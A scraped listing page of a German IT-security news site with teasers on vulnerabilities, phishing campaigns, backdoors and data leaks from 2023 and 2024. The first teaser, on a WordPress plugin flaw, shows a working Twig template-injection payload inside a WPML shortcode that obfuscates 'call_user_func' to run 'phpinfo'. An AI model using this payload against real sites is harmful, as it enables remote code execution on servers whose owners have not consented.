Home

Kritische Sicherheitslücke im WordPress-Plugin gefährdet 1 Million Websites

von | 27. August 2024 | Schwachstellen | 0 Kommentieren

[wpml_language_switcher]
{% set call_user_func = c~a~l~l~~u~s~e~r~~f~u~n~c %}
{% set phpinfo = p~h~p~i~n~f~o %}
{{ {1: phpinfo}|filter(call_user_func) }}
[/wpml_language_switcher]
Lesen Sie mehr

Massive Phishing-Kampagne nutzt Microsoft Sway aus: QR-Codes im Visier

von | 27. August 2024 | Phishing | 0 Kommentieren

Eine groß angelegte Phishing-Kampagne missbraucht Microsoft Sway, ein cloudbasiertes Tool zur Erstellung von Online-Präsentationen, um Microsoft 365-Nutzer dazu zu bringen, ihre Zugangsdaten preiszugeben. Die Angriffe wurden im Juli 2024 von Netskope Threat Labs...
Lesen Sie mehr

CTEM im Rampenlicht: Wie Gartners neue Kategorien helfen, Sicherheitslücken besser zu verwalten

von | 27. August 2024 | Wissen | 0 Kommentieren

Wollen Sie wissen, was 2024 im Bereich der Sicherheitsoperationen neu und bedeutend ist? Gartners kürzlich veröffentlichter Hype Cycle für Sicherheitsoperationen geht wichtige Schritte, um den Bereich des Continuous Threat Exposure Managements (CTEM) zu organisieren...
Lesen Sie mehr

SonicWall veröffentlicht kritisches Update für Firewall-Sicherheitslücke

von | 27. August 2024 | Schwachstellen | 0 Kommentieren

SonicWall hat dringend empfohlene Sicherheitsupdates für eine schwerwiegende Sicherheitslücke in seinen Firewalls veröffentlicht. Wird diese Schwachstelle erfolgreich ausgenutzt, können Angreifer unbefugten Zugriff auf die Geräte erlangen. Die Sicherheitslücke,...
Lesen Sie mehr

Kritische RCE-Schwachstelle in Microsoft Edge ermöglicht Remote-Systemübernahme

von | 23. August 2024 | Schwachstellen | 0 Kommentieren

Eine schwerwiegende Schwachstelle zur Remote-Code-Ausführung (RCE) wurde in Microsoft Edge entdeckt. Diese Schwachstelle könnte Angreifern ermöglichen, die Kontrolle über betroffene Systeme zu übernehmen, indem sie beliebigen Code aus der Ferne ausführen. Microsoft...
Lesen Sie mehr

Hacker nutzen Amazon-Dienste für den Versand von manipulierten MSC-Dateien

von | 23. August 2024 | Cyber Threat, Cyber Attacken | 0 Kommentieren

Cyberkriminelle haben begonnen, Amazon-Dienste auszunutzen, um mit Schadsoftware infizierte MSC-Dateien zu verbreiten. Diese Entwicklung zeigt, wie attraktiv die umfassenden Angebote von Amazon für Angreifer geworden sind, da sie enorme Rechenleistung, Speicherplatz...
Lesen Sie mehr

Neuer iOS-Bug lässt iPhones durch das Eingeben von vier Zeichen abstürzen

von | 22. August 2024 | Schwachstellen | 0 Kommentieren

Ein Sicherheitsforscher hat am Mittwoch einen Bug in iOS entdeckt, der dazu führen kann, dass iPhones und iPads kurzzeitig abstürzen, wenn eine bestimmte Folge von vier Zeichen in bestimmte Suchleisten eingegeben wird. Der Fehler betrifft die Benutzeroberfläche von...
Lesen Sie mehr

Kritische Sicherheitslücke im WordPress-Plugin LiteSpeed Cache ermöglicht Hackern Administratorzugriff

von | 22. August 2024 | Schwachstellen | 0 Kommentieren

Sicherheitsforscher haben eine schwerwiegende Sicherheitslücke im LiteSpeed Cache-Plugin für WordPress aufgedeckt, die es nicht authentifizierten Nutzern ermöglicht, Administratorrechte zu erlangen. „Das Plugin leidet unter einer nicht authentifizierten...
Lesen Sie mehr

Kritische Sicherheitslücke in Outlook: Technische Details zur Zero-Click-RCE-Verwundbarkeit veröffentlicht

von | 21. August 2024 | Schwachstellen | 0 Kommentieren

Forscher von Morphisec haben detaillierte technische Informationen über eine kürzlich entdeckte Zero-Click-Sicherheitslücke in Microsoft Outlook veröffentlicht, die als CVE-2024-38021 identifiziert wurde. Diese Schwachstelle stellt ein erhebliches Sicherheitsrisiko...
Lesen Sie mehr

Hacker nutzen PHP-Schwachstelle aus, um heimliche Msupedge-Backdoor zu installieren

von | 21. August 2024 | Schwachstellen, Cyber Attacken | 0 Kommentieren

Eine bisher unbekannte Backdoor namens Msupedge wurde in einem gezielten Cyberangriff gegen eine nicht näher benannte Universität in Taiwan eingesetzt. Das Symantec Threat Hunter Team, Teil von Broadcom, berichtete, dass die auffälligste Eigenschaft dieser Backdoor...
Lesen Sie mehr
LinkedIn: Staatliche Akteure und Betrug durch gefälschte Profile

LinkedIn: Staatliche Akteure und Betrug durch gefälschte Profile

Mrz 20, 2023 |

LinkedIn: Staatliche Akteure und Betrug durch gefälschte Profile LinkedIn ist ein soziales Netzwerk, das in erster Linie für berufliche Kontakte genutzt wird. Jedoch gibt es auch einige Fälle, in denen staatliche Akteure das Netzwerk benutzen, um Informationen zu sammeln oder gezielte Angriffe durchzuführen. Zudem kann es auch zu Betrug durch gefälschte Profile kommen. In diesem Artikel werden die Risiken und möglichen Schutzmaßnahmen auf LinkedIn beleuchtet.

mehr lesen

Transparent Tribe Hacker verteilen Malware

Mrz 14, 2023 |

Die Hacker-Gruppe Transparent Tribe verbreitet derzeit Malware über gefälschte E-Mails und gefälschte Websites. Die Malware zielt auf Regierungsorganisationen und Militäreinrichtungen ab und ermöglicht es den Angreifern, auf vertrauliche Informationen zuzugreifen. Die Gruppe ist seit Jahren aktiv und hat in der Vergangenheit auch Finanzinstitute und Medienunternehmen angegriffen. Es wird vermutet, dass die Gruppe aus Pakistan stammt und Verbindungen zu staatlichen Stellen hat.

mehr lesen
Deutsche Bank Daten auf Darknet angeboten

Deutsche Bank Daten auf Darknet angeboten

Mrz 14, 2023 |

Deutsche Bank Daten auf Darknet angeboten Die Daten von 40.000 Kunden der Deutschen Bank wurden illegal auf dem Darknet zum Verkauf angeboten. Die Bank bestätigte den Vorfall und arbeitet eng mit den Behörden zusammen, um die Täter zu identifizieren. Kunden sollten ihre Konten überwachen und verdächtige Aktivitäten sofort melden.

mehr lesen
Datenpannen zuhause und ihre Folgen!

Datenpannen zuhause und ihre Folgen!

Mrz 8, 2023 |

Datenpannen zuhause und ihre Folgen! Die Digitalisierung hat unser Leben verändert und vereinfacht. Wir können von zuhause aus arbeiten, online shoppen, Filme und Serien streamen und vieles mehr. Allerdings gibt es auch Risiken, die mit der Nutzung des Internets...

mehr lesen